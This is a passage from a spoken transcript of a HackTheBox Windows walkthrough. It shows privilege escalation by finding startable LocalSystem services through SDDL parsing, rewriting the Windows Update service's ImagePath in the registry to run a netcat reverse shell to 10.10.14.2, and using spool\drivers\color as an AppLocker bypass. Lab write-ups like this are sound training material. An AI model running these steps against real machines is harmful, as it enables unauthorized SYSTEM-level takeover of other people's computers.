measure, we could get a count. That's 613 services. Way too many. So if we look at this, the display name, where is it? Error. It's going to be, I think it's object something. Object name. So let's get object name and look at this. So services, select object name. And we're only interested in local system because we already have like a network service account. That's what it's running as. So if we do now services and we change this to be where, and then object name is equal to local system. We can say there's going to be temp, I guess, is equal to that. Okay. Temp, select PS child name, measure. So now we got 137 services. We also want the startup to be manual. So if we Google, let's go back here and registry service start value. See if this works. Okay. Here's what we want. I think a driver can't be loaded. That's not it. Kernel. I don't know where it's getting this, but 2 is automatic, I think. 3 is manual, 4 is disabled. So we want 3. I don't know what 1 or 0 is. If you do a lot of Googling, you'd find it out, but 3 is set to manual. So we can do here, and we want to change this to be dash and this will be object, no, not object name. Start is equal to 3. I think that's right. Temp. We can just hit up a few times. 89. So now if we look at this, we're only doing things that are equal to 3. So all the manual ones. So if we do temp select PS child name, you can see all the services on this box that are startup type is equal to manual. The last thing we want is to be able to see what services we have the start permission to. And I don't know a good way to convert the, get item security. Convert this property, the binary form DACL, into readable, but we can use SC, and SC is the Windows binary. It's within like SQL and Windows System32 sc.exe. If we're in a PowerShell prompt and just type it, it's probably going to do something different. I forget what this is alias to. It's the same reason where like if we do get child items, is it get child item? We run this command, and that command is the same thing as GCI. It's PowerShell has something for SC. So if we just type SC, it's not going to do the executable SC. So to get around that, I do cmd/c, and we can do sc sd show, and this will be, let's keep doing Windows updates, wuauserv. So we got this DACL, and we can also convert this. So if we do the, convert from SddlString -SDDL, I think capital S. I don't know if casing probably doesn't matter. And we can convert this. Oh, convert from, oh, forgot the T. There we go. And we could go again and select this and do for each object and this discretionary ACL to print it a bit better. We can go back here. We'll just delete that real quick. So authenticated users is what we want. So this SDDL, let's see, AU. So the username is the last. So AU, this is going to be probably built-in administrators. So that one's probably this one. And this is system. So that's users, and A is allow. So everything they're allowed to do. And these are what the permissions are. So CCs probably create directories or something. But RP is what we want, I think. If we go to Google, and Google, let's see, SDDL start stop service. And this blog post explains everything super well. It's also explaining that DACL in the registry. And we could probably update this for any service and give ourselves permission over a service since we have write access to the registry. But RP is service start, WP is service stop, and RC is read control. So let's go back to our shell. And we're going to convert from ACL string. And we're only going to do the AU because that's what we care about. And let's just look at what RP is. That'll be write extended attributes. So let's see. WP would be stop. And I'm only doing this because there's no, type and convert to SDDLString. If we look at this man page, do I still have it? Yes, I do. Go to the types. There's nothing for registry as a service or a service DACL. So if there was, you do type, and then when you do RP, it would show service start, but that doesn't exist. So we're just remembering RP means write extended attribute. Or RP is service start, which our tool is going to tell us is write extended attribute. Nothing really that important. I'm just explaining it in case you go digging down rabbit holes, and that's something that would have saved me time knowing. But what I want to do is we have a list of services. We called it temp, actually. Temp? Yeah. So we want to do names is equal to temp.ps child name. So now we got a variable with just a bunch of services. So what we're going to do is do a for each service in names. And I'm typing in here because we have to do it in one line on this box. And if we do it in one line, it's going to be confusing. So SDDL is equal to cmd/c sc sd show service. And then we'll do if SDDL is a match for RP, and then A to Z, and then anything, 1, 2, 3 AU. Then we'll put service and close this and close this. So essentially what we're doing here is going to be looping through every service in the box, running this sc/sd show command, and if it matches the service start permission and then repeat any characters any number of times, do 3 semicolons for authenticated users, add that to the variable. So again, do we have it still in our PowerShell? So this was the DACL, and we can get rid of the last one, just so it's one line. So in this, it's going to match the RP here, and then it's going to be fine with any other character an unlimited amount of times until it hits semicolon 3 times, and that's looking for AU for authenticated users. So that's why this is going to match. When it goes here, it's going to see RP, it's going to match, hit 3 semicolons, and oh, built-in administrators, nope, doesn't match the AU. So that's what this command is doing. So let's put this on one line, and then hope it works. Okay. And we'll call this one start. Okay. Or we can call this can start. Paste, run, and of course, did not work. So let's see. For each service and names, SDDL, if SDDL match, we probably have to put parenthesis here. Let's see. Oh. So if you look really close, you got stupid Unicode quotes because that's what this put. The angled. We don't want angles. There we go. I've wasted so much time in my life because of the angle a quote is facing. It's ridiculous. Can start. So here's all the services we can start. So let's do notes. Okay. So let's keep working with Windows Update Service. So first, before we do anything, I want to show you that there's two different permissions on a service. So if we go Windows System 32, I'm just going to do /sc so you can see this works. So we're not doing the cmd/c. I think if I just type sc in something, it will hang my session. So that's why I'm not doing that. Sc query wauserv, and we can see the state is 1, which is stopped. I bet if we just queried a bunch of services, we could figure out exactly what each state is, but oh well. So instead of this, we want to do, what is it? It's going to be sc and then config. Config wauserv, and it's either BinPath or ImagePath, I think. BinPath is equal to test. We get access denied. ImagePath is equal to test. Okay, that doesn't work. We only have these things. So BinPath is this. ImagePath is in the registry. But we get access denied there. If we go back into HKey local machine, get item for wauserv, ImagePath is here. So we can set item wauserv dash path. Oh, set item, whoops, dash path wauserv dash name, ImagePath dash value, C colon back, we'll just do please subscribe. Cannot be found name. Set item dash path WA. Windows update something update. That's right. I thought it was dash name. Let's see. Is it case sensitive? Let's see. Get item. That's there. Maybe it's dash property. I'm doing something wrong. Maybe set item is alias to something I'm not thinking it is. So we'll do the full command, set item property. There we go. So set item is probably a command, and that's not meant for registry. Okay. Get item wauserv, and we can see we have now changed the image path. So what we want to do is change the image path to be something we can execute. So I'm going to use netcat. When doing like PowerShell IEX stuff in a registry, it's just so many bad characters, you may not work. So we're going to go into CD Windows System 32, spool drivers color. And this is generally just a window spot where authenticated users can write. So I always like dropping binaries here. As a benefit, if like AppLocker is blacklisting EXEs out of non-normal spots, generally there's a whitelist for executing anything under Windows System 32. And if you write to this directory, you can access that whitelist. So it's also a good AppLocker bypass directory. Let's do wget 10.10.14.2 nc.exe-o nc.exe. And before we do that, locate nc.exe. Let's copy out of user share Windows resources binaries to www. Okay. Boom. Let's now create this 9001 and we'll do nc.exe. We'll probably have to do //10.10.14.2 9001-e PowerShell. And I'm just making sure the netcat I had downloaded had the -e flag. Like, I don't think which nc, actually Kali now symlinks this netcat to that. Long story short, there are multiple versions of netcat, and some of them do not have the -e flag. This is linked to ncat, so I digress. That was a rabbit hole. Let's just get through this box. So listen on port 9001, and we'll go back up here. We have to go into HKey local machine. So go up, and this value is going to be the path of the registry. Whoops. And then nc.exe 10.10.14.2 9001-e PowerShell. So let's do get item the wuauserv. So now we can see what this image path is. I think it just truncated. I think there's a PowerShell. I have no reason to believe there isn't. Oh, it's going to a new line. There it is. So let's make sure we're listening. 9001. Our netcat is 9001. So start-service wuauserv. And there we go. Do who am I? We are NT authority system. So if we go to users, administrator, desktop, and now that HackTheBox rotates their flags, we can now show the flag and not worry about people just copy and pasting it in. So I'm doing this because sometimes Windows does EFS, the encrypted file system, which would make you need the administrator's password to read it if it was set. If you just search ipsec.rocks for EFS, we go into it. But yeah, so that is the box. Hope you guys enjoyed. Take care, and I will see you all next week.